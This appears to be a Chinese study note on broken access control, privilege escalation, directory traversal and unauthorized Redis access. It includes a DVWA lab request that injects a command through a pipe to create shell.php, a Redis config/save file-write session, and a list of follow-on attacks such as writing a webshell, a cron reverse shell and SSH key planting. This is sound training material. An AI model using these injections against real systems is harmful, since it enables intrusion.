失效的访问控制

1.失效的访问控制

1.1 OWASP Top 10

1.1.1 A5:2017-Broken Access Control

​ 未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的帐户、查看敏感文件、修改其他用户的数据、更改访问权限等。

1.1.2 A01:2021-Broken Access Control

访问控制强制实施策略,使用户无法在其预期权限之外进行操作。失败的访问控制通常会导致未经授权的信息泄露、修改或销毁所有数据、或在用户权限之外执行业务功能。

1.2 失效访问控制类别

1.2.1 水平越权

在同级别账户中横向移动。

1.2.2 垂直越权

普通用户获取管理员权限。

1.3 攻防案例

1.3.1 DVWA 越权

POST /dvwa_2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1 Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.111.15/dvwa_2.0.1/vulnerabilities/exec/source/
Connection: close
Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded Content-Length: 77

ip=127.0.0.0.1|echo+""+>+shell.php&Submit=Submit

1.4 相关漏洞

1.4.1 目录遍历

目录穿越,目录遍历,Directory Traversal。Web 用户,通过某种方式,可以访问Web 根目录以外的文件,甚至执行系统命令。造成目录遍历漏洞的原因:

  • 文件包含

  • 文件读取

  • RCE

1.4.2 未授权访问

未授权访问,Unauthorized Access。重要资产根本没有做访问控制限制,导致黑客攻击者可以在没有授权的情况下操作重要资产,包括读写文件,执行命令等敏感操作。

2.未授权访问

2.1 Redis 未授权访问

2.1.1 Redis 介绍

  • Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

  • Redis 数据库经常用于Web 应用的缓存。

  • Redis 可以与文件系统进行交互。

  • Redis 监听TCP/6379。

2.1.2 Redis 简单使用

┌──(cgjil�� zh-CN)-[~/vulhub/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1 127.0.0.1:6379> set name cgjil OK
127.0.0.1:6379> get name "cgjil"
127.0.0.1:6379> config set dir /tmp/
OK
127.0.0.1:6379> config set dbfilename cgjil.txt OK
127.0.0.1:6379> save OK
127.0.0.1:6379>

2.1.3 Redis 未授权访问

读取数据内容 读写系统文件
数据 泄露 直接写webshell
计划任务反弹shell
SSH免密登录

你可能感兴趣的:(漏洞,安全)